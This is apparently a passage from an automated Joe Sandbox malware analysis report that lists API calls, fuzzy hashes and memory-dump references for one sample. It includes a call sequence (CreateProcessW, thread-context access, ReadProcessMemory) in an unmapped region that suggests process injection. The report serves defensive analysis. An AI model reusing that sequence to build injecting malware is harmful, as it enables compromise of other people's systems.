                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Temp$FileNamePath
                                            • String ID: aut
                                            • API String ID: 3285503233-3010740371
                                            • Opcode ID: cf2f1b8fef5f8779ea92dbc7a373230b7b7fe8d867cf03c0dd1ed1c5f1d2fd3c
                                            • Instruction ID: b342f3d4b1a05964ae1ef05bdae82437760f51e0d8f5722ac7764972021d8de3
                                            • Opcode Fuzzy Hash: cf2f1b8fef5f8779ea92dbc7a373230b7b7fe8d867cf03c0dd1ed1c5f1d2fd3c
                                            • Instruction Fuzzy Hash: A7D05E7250030EBBDB10AB94DC0EFCA7B6CA700704F0001A07650E51F1DBB4E6998B54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d477eb8d9d742e3e6c8205e710248059828511d8ec202319d998f416de0d9937
                                            • Instruction ID: 79074c3a26835740542d465050757bef425fe540f498ceca761a84f4bc89534f
                                            • Opcode Fuzzy Hash: d477eb8d9d742e3e6c8205e710248059828511d8ec202319d998f416de0d9937
                                            • Instruction Fuzzy Hash: 9AF149716043059FC710DF28C885B5AB7E5FF88315F14892EFA99DB292DB70E949CB82
                                            APIs
                                            • _memset.LIBCMT ref: 00805022
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008050CB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell__memset
                                            • String ID:
                                            • API String ID: 928536360-0
                                            • Opcode ID: a4ccedf962fe6e446f3fb5b408f6d46823752f543fda91b8dab27c1fd5547229
                                            • Instruction ID: a98b39b8684b994295324bba4c64954fc6d7291483deaf9375e2cd9318a5d21c
                                            • Opcode Fuzzy Hash: a4ccedf962fe6e446f3fb5b408f6d46823752f543fda91b8dab27c1fd5547229
                                            • Instruction Fuzzy Hash: 6A3152B1505B01CFD761DF28D88569BBBF4FF49304F00092EE59AC6291D7716944CFA6
                                            APIs
                                            • __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 008281C2: __NMSG_WRITE.LIBCMT ref: 008281E9
                                              • Part of subcall function 008281C2: __NMSG_WRITE.LIBCMT ref: 008281F3
                                            • __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082821F: GetModuleFileNameW.KERNEL32(00000000,008C0312,00000104,00000000,00000001,00000000), ref: 008282B1
                                              • Part of subcall function 0082821F: ___crtMessageBoxW.LIBCMT ref: 0082835F
                                              • Part of subcall function 00821145: ___crtCorExitProcess.LIBCMT ref: 0082114B
                                              • Part of subcall function 00821145: ExitProcess.KERNEL32 ref: 00821154
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                            • String ID:
                                            • API String ID: 1372826849-0
                                            • Opcode ID: 4e6fb2799233a3c188da5b76b2b454ba7cc7fb8311eae0bb110376ac286d0e4d
                                            • Instruction ID: fe8c599f7cb4ba200519b7935f4af88bd429f16f8a110c57cd98b93346bb5595
                                            • Opcode Fuzzy Hash: 4e6fb2799233a3c188da5b76b2b454ba7cc7fb8311eae0bb110376ac286d0e4d
                                            • Instruction Fuzzy Hash: 1A019635245635DAEA113B39FC66B2A3B98FB83764F210026F505D6182DBB89DC086A5
                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0084C385,?,?,?,?,?,00000004), ref: 0084C6F2
                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0084C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0084C708
                                            • CloseHandle.KERNEL32(00000000,?,0084C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0084C70F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: dfc536047d8b20e2113bc767f7fd085dc0b812d472b04e6994b89678b209365d
                                            • Instruction ID: 137b9afec76813fe286760b9564cbe4169671de40603d2c46aec3f9ab5c99e3d
                                            • Opcode Fuzzy Hash: dfc536047d8b20e2113bc767f7fd085dc0b812d472b04e6994b89678b209365d
                                            • Instruction Fuzzy Hash: 53E08636141314B7D7212B58AC0DFCA7B18FF05770F104110FB14691E097B129118798
                                            APIs
                                              • Part of subcall function 008022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008024F1), ref: 00802303
                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008025A1
                                            • CoInitialize.OLE32(00000000), ref: 00802618
                                            • CloseHandle.KERNEL32(00000000), ref: 0087503A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                            • String ID:
                                            • API String ID: 3815369404-0
                                            • Opcode ID: 7b4fc726185490762ea724be5233d590cf87769ac5726f1a039e331fde386baf
                                            • Instruction ID: b2d0b58f70e9b07ff606b128cc350196e16a1aa7b7861a652a336701fe479c55
                                            • Opcode Fuzzy Hash: 7b4fc726185490762ea724be5233d590cf87769ac5726f1a039e331fde386baf
                                            • Instruction Fuzzy Hash: E071BCB89012818ACB44EFAAADDCD95BBB5FB9B344790422ED109C77A3CB748414CF09
                                            APIs
                                            • IsThemeActive.UXTHEME ref: 00803A73
                                              • Part of subcall function 00821405: __lock.LIBCMT ref: 0082140B
                                              • Part of subcall function 00803ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00803AF3
                                              • Part of subcall function 00803ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00803B08
                                              • Part of subcall function 00803D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00803AA3,?), ref: 00803D45
                                              • Part of subcall function 00803D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00803AA3,?), ref: 00803D57
                                              • Part of subcall function 00803D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,008C1148,008C1130,?,?,?,?,00803AA3,?), ref: 00803DC8
                                              • Part of subcall function 00803D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00803AA3,?), ref: 00803E48
                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00803AB3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                            • String ID:
                                            • API String ID: 924797094-0
                                            • Opcode ID: f2354c8f86f7a85a939b5cf59d70f316b207e67879be71acedb1ab9da3f93bb9
                                            • Instruction ID: c50c33a23aed6dae60a1a48931d5473ec2c6478dd7360d564d76a58f9839c9ac
                                            • Opcode Fuzzy Hash: f2354c8f86f7a85a939b5cf59d70f316b207e67879be71acedb1ab9da3f93bb9
                                            • Instruction Fuzzy Hash: 09116771A083519FCB00EF69EC4990ABBF9FF95710F00891EF589C72A2DB7095948B92
                                            APIs
                                            • ___lock_fhandle.LIBCMT ref: 0082EA29
                                            • __close_nolock.LIBCMT ref: 0082EA42
                                              • Part of subcall function 00827BDA: __getptd_noexit.LIBCMT ref: 00827BDA
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                            • String ID:
                                            • API String ID: 1046115767-0
                                            APIs
                                              • Part of subcall function 0082395C: __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 0082395C: __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082395C: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            • std::exception::exception.LIBCMT ref: 0081F51E
                                            • __CxxThrowException@8.LIBCMT ref: 0081F533
                                              • Part of subcall function 00826805: RaiseException.KERNEL32(?,?,0000000E,008B6A30,?,?,?,0081F538,0000000E,008B6A30,?,00000001), ref: 00826856
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 3902256705-0
                                            APIs
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __lock_file.LIBCMT ref: 00823629
                                              • Part of subcall function 00824E1C: __lock.LIBCMT ref: 00824E3F
                                            • __fclose_nolock.LIBCMT ref: 00823634
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                            • String ID:
                                            • API String ID: 2800547568-0
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 011B257B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B2611
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B2633
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            APIs
                                            • __flush.LIBCMT ref: 00822A0B
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __flush__getptd_noexit
                                            • String ID:
                                            • API String ID: 4101623367-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            APIs
                                              • Part of subcall function 00804214: FreeLibrary.KERNEL32(00000000,?), ref: 00804247
                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008039FE,?,00000001), ref: 008041DB
                                              • Part of subcall function 00804291: FreeLibrary.KERNEL32(00000000), ref: 008042C4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Library$Free$Load
                                            • String ID:
                                            • API String ID: 2391024519-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            APIs
                                            • ___lock_fhandle.LIBCMT ref: 0082AFC0
                                              • Part of subcall function 00827BDA: __getptd_noexit.LIBCMT ref: 00827BDA
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit$___lock_fhandle
                                            • String ID:
                                            • API String ID: 1144279405-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • __lock_file.LIBCMT ref: 00822AED
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit__lock_file
                                            • String ID:
                                            • API String ID: 2597487223-0
                                            APIs
                                            • FreeLibrary.KERNEL32(?,?,?,?,?,008039FE,?,00000001), ref: 00804286
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            APIs
                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008040C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LongNamePath
                                            • String ID:
                                            • API String ID: 82841172-0
                                            APIs
                                            • Sleep.KERNELBASE(000001F4), ref: 011B2DD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0086F87D
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086F8DC
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0086F919
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0086F940
                                            • SendMessageW.USER32 ref: 0086F966
                                            • _wcsncpy.LIBCMT ref: 0086F9D2
                                            • GetKeyState.USER32(00000011), ref: 0086F9F3
                                            • GetKeyState.USER32(00000009), ref: 0086FA00
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086FA16
                                            • GetKeyState.USER32(00000010), ref: 0086FA20
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0086FA4F
                                            • SendMessageW.USER32 ref: 0086FA72
                                            • SendMessageW.USER32(?,00001030,?,0086E059), ref: 0086FB6F
                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0086FB85
                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0086FB96
                                            • SetCapture.USER32(?), ref: 0086FB9F
                                            • ClientToScreen.USER32(?,?), ref: 0086FC03
                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0086FC0F
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0086FC29
                                            • ReleaseCapture.USER32 ref: 0086FC34
                                            • GetCursorPos.USER32(?), ref: 0086FC69
                                            • ScreenToClient.USER32(?,?), ref: 0086FC76
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FCD8
                                            • SendMessageW.USER32 ref: 0086FD02
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0086FD41
                                            • SendMessageW.USER32 ref: 0086FD6C
                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0086FD84
                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0086FD8F
                                            • GetCursorPos.USER32(?), ref: 0086FDB0
                                            • ScreenToClient.USER32(?,?), ref: 0086FDBD
                                            • GetParent.USER32(?), ref: 0086FDD9
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FE3F
                                            • SendMessageW.USER32 ref: 0086FE6F
                                            • ClientToScreen.USER32(?,?), ref: 0086FEC5
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0086FEF1
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0086FF19
                                            • SendMessageW.USER32 ref: 0086FF3C
                                            • ClientToScreen.USER32(?,?), ref: 0086FF86
                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0086FFB6
